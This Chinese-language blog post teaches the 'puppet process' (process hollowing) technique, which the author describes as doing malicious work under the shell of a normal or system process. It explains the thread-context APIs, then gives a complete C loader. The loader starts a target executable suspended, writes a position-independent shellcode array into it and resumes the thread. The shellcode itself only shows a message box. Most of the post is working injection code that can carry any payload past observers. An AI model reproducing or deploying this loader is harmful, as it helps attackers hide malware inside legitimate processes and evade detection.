隐藏技术-傀儡进程

本文最后更新于:2021-08-09 晚上

傀儡进程

借着正常的软件进程或者系统进程的外壳来进行恶意的操作。

函数介绍

GetThreadContext

检索指定线程的上下文

64位程序可以使用Wow64GetThreadContext检索WOW64线程的上下文。

1
2
3
4
BOOL GetThreadContext(
  HANDLE    hThread,
  LPCONTEXT lpContext
);

hThread:要检索其上下文的线程的句柄。句柄必须有THREAD_GET_CONTEXT访问权限。

lpContext:指向上下文结构的指针,它接受指定线程适当的上下文。该结构中的ContextFlags成员可以指定检索线程上下文的哪些部分。上下文结构具有高度的处理器特性。

返回值:成功返回不为0,否则为0。

SetThreadContext

设置指定线程的上下文。64位可以用Wow64SetThreadContext设置

1
2
3
4
BOOL SetThreadContext(
  HANDLE        hThread,
  const CONTEXT *lpContext
);

hThread:指定线程的句柄,并将设置其上下文。该句柄必须具有线程的THREAD_SET_CONTEXT权限。

lpContext:指向要在指定进程中设置上下文结构的指针。此结构中ContextFlags成员值可以指定要设置线程上下文的哪些部分。

返回值:如果设置了上下文,则返回值为非0,否则为0;

ResumeThread

减少线程的暂停计数。当暂停计数减到0时,恢复线程的执行。

1
2
3
DWORD ResumeThread(
  HANDLE hThread
);

hThread:要重新启动线程的句柄。该句柄必须具有THREAD_SUSPEND_RESUME权限。

返回值:如果成功,返回值是线程先前挂起的计数,如果失败,则返回(DWORD)-1。

代码实现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
#include <Windows.h>
#include <stdio.h>
BOOL ReplacProcess(char* pszFilePath);
char data[] = { 0x55 ,0x8B ,0xEC ,0x83 ,0xEC ,0x4C ,0xE8 ,0x15 ,0x01 ,0x00 ,0x00 ,0x89 ,0x45 ,0xFC ,0x8B ,0x45 ,0xFC ,0x50
						,0xE8 ,0x29 ,0x01 ,0x00 ,0x00 ,0x83 ,0xC4 ,0x04 ,0x89 ,0x45 ,0xF8 ,0xC6 ,0x45 ,0xB4 ,0x4C ,0xC6 ,0x45 ,0xB5
						,0x6F ,0xC6 ,0x45 ,0xB6 ,0x61 ,0xC6 ,0x45 ,0xB7 ,0x64 ,0xC6 ,0x45 ,0xB8 ,0x4C ,0xC6 ,0x45 ,0xB9 ,0x69 ,0xC6
						,0x45 ,0xBA ,0x62 ,0xC6 ,0x45 ,0xBB ,0x72 ,0xC6 ,0x45 ,0xBC ,0x61 ,0xC6 ,0x45 ,0xBD ,0x72 ,0xC6 ,0x45 ,0xBE
						,0x79 ,0xC6 ,0x45 ,0xBF ,0x41 ,0xC6 ,0x45 ,0xC0 ,0x00 ,0x8D ,0x4D ,0xB4 ,0x51 ,0x8B ,0x55 ,0xFC ,0x52 ,0xFF
						,0x55 ,0xF8 ,0x89 ,0x45 ,0xF4 ,0xC6 ,0x45 ,0xC4 ,0x4D ,0xC6 ,0x45 ,0xC5 ,0x65 ,0xC6 ,0x45 ,0xC6 ,0x73 ,0xC6
						,0x45 ,0xC7 ,0x73 ,0xC6 ,0x45 ,0xC8 ,0x61 ,0xC6 ,0x45 ,0xC9 ,0x67 ,0xC6 ,0x45 ,0xCA ,0x65 ,0xC6 ,0x45 ,0xCB
						,0x42 ,0xC6 ,0x45 ,0xCC ,0x6F ,0xC6 ,0x45 ,0xCD ,0x78 ,0xC6 ,0x45 ,0xCE ,0x41 ,0xC6 ,0x45 ,0xCF ,0x00 ,0xC6
						,0x45 ,0xD0 ,0x55 ,0xC6 ,0x45 ,0xD1 ,0x73 ,0xC6 ,0x45 ,0xD2 ,0x65 ,0xC6 ,0x45 ,0xD3 ,0x72 ,0xC6 ,0x45 ,0xD4
						,0x33 ,0xC6 ,0x45 ,0xD5 ,0x32 ,0xC6 ,0x45 ,0xD6 ,0x2E ,0xC6 ,0x45 ,0xD7 ,0x64 ,0xC6 ,0x45 ,0xD8 ,0x6C ,0xC6
						,0x45 ,0xD9 ,0x6C ,0xC6 ,0x45 ,0xDA ,0x00 ,0x8D ,0x45 ,0xC4 ,0x50 ,0x8D ,0x4D ,0xD0 ,0x51 ,0xFF ,0x55 ,0xF4
						,0x50 ,0xFF ,0x55 ,0xF8 ,0x89 ,0x45 ,0xF0 ,0xC6 ,0x45 ,0xDC ,0x62 ,0xC6 ,0x45 ,0xDD ,0x31 ,0xC6 ,0x45 ,0xDE
						,0x61 ,0xC6 ,0x45 ,0xDF ,0x63 ,0xC6 ,0x45 ,0xE0 ,0x6B ,0xC6 ,0x45 ,0xE1 ,0x69 ,0xC6 ,0x45 ,0xE2 ,0x65 ,0xC6
						,0x45 ,0xE3 ,0x21 ,0xC6 ,0x45 ,0xE4 ,0x00 ,0xC6 ,0x45 ,0xE8 ,0x74 ,0xC6 ,0x45 ,0xE9 ,0x65 ,0xC6 ,0x45 ,0xEA
						,0x73 ,0xC6 ,0x45 ,0xEB ,0x74 ,0xC6 ,0x45 ,0xEC ,0x00 ,0x6A ,0x00 ,0x8D ,0x55 ,0xE8 ,0x52 ,0x8D ,0x45 ,0xDC
						,0x50 ,0x6A ,0x00 ,0xFF ,0x55 ,0xF0 ,0x33 ,0xC0 ,0x8B ,0xE5 ,0x5D ,0xC3 ,0xCC ,0xCC ,0xCC ,0xCC ,0xCC ,0xCC
						,0x64 ,0xA1 ,0x30 ,0x00 ,0x00 ,0x00 ,0x8B ,0x40 ,0x0C ,0x8B ,0x40 ,0x14 ,0x8B ,0x00 ,0x8B ,0x00 ,0x8B ,0x40
						,0x10 ,0xC3 ,0xCC ,0xCC ,0xCC ,0xCC ,0xCC ,0xCC ,0xCC ,0xCC ,0xCC ,0xCC ,0xCC ,0xCC ,0x55 ,0x8B ,0xEC ,0x83
						,0xEC ,0x2C ,0x8B ,0x45 ,0x08 ,0x89 ,0x45 ,0xF8 ,0x8B ,0x4D ,0xF8 ,0x8B ,0x55 ,0xF8 ,0x03 ,0x51 ,0x3C ,0x89
						,0x55 ,0xE8 ,0xB8 ,0x08 ,0x00 ,0x00 ,0x00 ,0x6B ,0xC8 ,0x00 ,0x8B ,0x55 ,0xE8 ,0x8B ,0x45 ,0xF8 ,0x03 ,0x44
						,0x0A ,0x78 ,0x89 ,0x45 ,0xF0 ,0x8B ,0x4D ,0xF0 ,0x8B ,0x55 ,0xF8 ,0x03 ,0x51 ,0x20 ,0x89 ,0x55 ,0xE0 ,0x8B
						,0x45 ,0xF0 ,0x8B ,0x4D ,0xF8 ,0x03 ,0x48 ,0x24 ,0x89 ,0x4D ,0xDC ,0x8B ,0x55 ,0xF0 ,0x8B ,0x45 ,0xF8 ,0x03
						,0x42 ,0x1C ,0x89 ,0x45 ,0xD8 ,0x8B ,0x4D ,0xF0 ,0x8B ,0x51 ,0x18 ,0x89 ,0x55 ,0xE4 ,0xC7 ,0x45 ,0xEC ,0x00
						,0x00 ,0x00 ,0x00 ,0xC7 ,0x45 ,0xF4 ,0x00 ,0x00 ,0x00 ,0x00 ,0xEB ,0x09 ,0x8B ,0x45 ,0xF4 ,0x83 ,0xC0 ,0x01
						,0x89 ,0x45 ,0xF4 ,0x8B ,0x4D ,0xF4 ,0x3B ,0x4D ,0xE4 ,0x0F ,0x83 ,0x6D ,0x01 ,0x00 ,0x00 ,0x8B ,0x55 ,0xF4
						,0x8B ,0x45 ,0xE0 ,0x8B ,0x4D ,0xF8 ,0x03 ,0x0C ,0x90 ,0x89 ,0x4D ,0xFC ,0xBA ,0x01 ,0x00 ,0x00 ,0x00 ,0x6B
						,0xC2 ,0x00 ,0x8B ,0x4D ,0xFC ,0x0F ,0xBE ,0x14 ,0x01 ,0x83 ,0xFA ,0x47 ,0x0F ,0x85 ,0x41 ,0x01 ,0x00 ,0x00
						,0xB8 ,0x01 ,0x00 ,0x00 ,0x00 ,0xC1 ,0xE0 ,0x00 ,0x8B ,0x4D ,0xFC ,0x0F ,0xBE ,0x14 ,0x01 ,0x83 ,0xFA ,0x65
						,0x0F ,0x85 ,0x29 ,0x01 ,0x00 ,0x00 ,0xB8 ,0x01 ,0x00 ,0x00 ,0x00 ,0xD1 ,0xE0 ,0x8B ,0x4D ,0xFC ,0x0F ,0xBE
						,0x14 ,0x01 ,0x83 ,0xFA ,0x74 ,0x0F ,0x85 ,0x12 ,0x01 ,0x00 ,0x00 ,0xB8 ,0x01 ,0x00 ,0x00 ,0x00 ,0x6B ,0xC8
						,0x03 ,0x8B ,0x55 ,0xFC ,0x0F ,0xBE ,0x04 ,0x0A ,0x83 ,0xF8 ,0x50 ,0x0F ,0x85 ,0xFA ,0x00 ,0x00 ,0x00 ,0xB9
						,0x01 ,0x00 ,0x00 ,0x00 ,0xC1 ,0xE1 ,0x02 ,0x8B ,0x55 ,0xFC ,0x0F ,0xBE ,0x04 ,0x0A ,0x83 ,0xF8 ,0x72 ,0x0F
						,0x85 ,0xE2 ,0x00 ,0x00 ,0x00 ,0xB9 ,0x01 ,0x00 ,0x00 ,0x00 ,0x6B ,0xD1 ,0x05 ,0x8B ,0x45 ,0xFC ,0x0F ,0xBE
						,0x0C ,0x10 ,0x83 ,0xF9 ,0x6F ,0x0F ,0x85 ,0xCA ,0x00 ,0x00 ,0x00 ,0xBA ,0x01 ,0x00 ,0x00 ,0x00 ,0x6B ,0xC2
						,0x06 ,0x8B ,0x4D ,0xFC ,0x0F ,0xBE ,0x14 ,0x01 ,0x83 ,0xFA ,0x63 ,0x0F ,0x85 ,0xB2 ,0x00 ,0x00 ,0x00 ,0xB8
						,0x01 ,0x00 ,0x00 ,0x00 ,0x6B ,0xC8 ,0x07 ,0x8B ,0x55 ,0xFC ,0x0F ,0xBE ,0x04 ,0x0A ,0x83 ,0xF8 ,0x41 ,0x0F
						,0x85 ,0x9A ,0x00 ,0x00 ,0x00 ,0xB9 ,0x01 ,0x00 ,0x00 ,0x00 ,0xC1 ,0xE1 ,0x03 ,0x8B ,0x55 ,0xFC ,0x0F ,0xBE
						,0x04 ,0x0A ,0x83 ,0xF8 ,0x64 ,0x0F ,0x85 ,0x82 ,0x00 ,0x00 ,0x00 ,0xB9 ,0x01 ,0x00 ,0x00 ,0x00 ,0x6B ,0xD1
						,0x09 ,0x8B ,0x45 ,0xFC ,0x0F ,0xBE ,0x0C ,0x10 ,0x83 ,0xF9 ,0x64 ,0x75 ,0x6E ,0xBA ,0x01 ,0x00 ,0x00 ,0x00
						,0x6B ,0xC2 ,0x0A ,0x8B ,0x4D ,0xFC ,0x0F ,0xBE ,0x14 ,0x01 ,0x83 ,0xFA ,0x72 ,0x75 ,0x5A ,0xB8 ,0x01 ,0x00
						,0x00 ,0x00 ,0x6B ,0xC8 ,0x0B ,0x8B ,0x55 ,0xFC ,0x0F ,0xBE ,0x04 ,0x0A ,0x83 ,0xF8 ,0x65 ,0x75 ,0x46 ,0xB9
						,0x01 ,0x00 ,0x00 ,0x00 ,0x6B ,0xD1 ,0x0C ,0x8B ,0x45 ,0xFC ,0x0F ,0xBE ,0x0C ,0x10 ,0x83 ,0xF9 ,0x73 ,0x75
						,0x32 ,0xBA ,0x01 ,0x00 ,0x00 ,0x00 ,0x6B ,0xC2 ,0x0D ,0x8B ,0x4D ,0xFC ,0x0F ,0xBE ,0x14 ,0x01 ,0x83 ,0xFA
						,0x73 ,0x75 ,0x1E ,0x8B ,0x45 ,0xF4 ,0x8B ,0x4D ,0xDC ,0x0F ,0xB7 ,0x14 ,0x41 ,0x89 ,0x55 ,0xEC ,0x8B ,0x45
						,0xEC ,0x8B ,0x4D ,0xD8 ,0x8B ,0x55 ,0xF8 ,0x03 ,0x14 ,0x81 ,0x89 ,0x55 ,0xD4 ,0xEB ,0x05 ,0xE9 ,0x7E ,0xFE
						,0xFF ,0xFF ,0x8B ,0x45 ,0xD4 ,0x8B ,0xE5 ,0x5D ,0xC3 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 };
int main() 
{
	if (ReplacProcess("C:\\Users\\Tophanter\\Desktop\\ConsoleApplication1.exe") == TRUE) {
		printf("傀儡进程成功\n");
	}
	else {
		printf("失败\n");
	}
	return 0;
}
BOOL ReplacProcess(char* pszFilePath)
{
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	CONTEXT threadContext = { 0 };
	RtlZeroMemory(&si, sizeof(si));
	RtlZeroMemory(&pi, sizeof(pi));
	RtlZeroMemory(&threadContext, sizeof(threadContext));
	si.cb = sizeof(STARTUPINFO);
	BOOL Flag = FALSE;
	//创建挂起的进程
	Flag = CreateProcess(pszFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
	if (Flag == FALSE) {
		printf("创建挂起进程失败\n");
		return FALSE;
	}
	//获取线程的上下文
	threadContext.ContextFlags = CONTEXT_FULL;
	Flag = GetThreadContext(pi.hThread, &threadContext);
	if (Flag == FALSE) {
		printf("获取线程上下文失败\n");
		return FALSE;
	}
	// 拿到目标进程主线程上下文后,在Ebx寄存器中保存的就是PEB的地址,
	// 而PEB结构偏移0x8的位置是AddressOfImageBase字段,
	// 所以直接来读取ctx.Ebx+0x8,就可以获取到目标进程的加载基址
	LPVOID lpBuffer = 0;
	Flag = ReadProcessMemory(pi.hProcess, (LPVOID)(threadContext.Ebx + 0x8), &lpBuffer, 4, NULL);
	if (Flag == FALSE) {
		printf("读取内存数据失败\n");
		return FALSE;
	}
	//写入shellcode
	Flag = WriteProcessMemory(pi.hProcess, (LPVOID)threadContext.Eax, data, sizeof(data), NULL);
	if (Flag == FALSE) {
		printf("写入数据失败\n");
		return FALSE;
	}
	//恢复执行
	ResumeThread(pi.hThread);
	return TRUE;
}

运行程序可以看到成功弹出shellcode 的内容。

使用任务管理器查看可以看到傀儡进程。

参考

《Windows黑客编程技术详解》

创建傀儡进程代码

黑客编程
恶意代码 黑客编程 隐藏技术

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!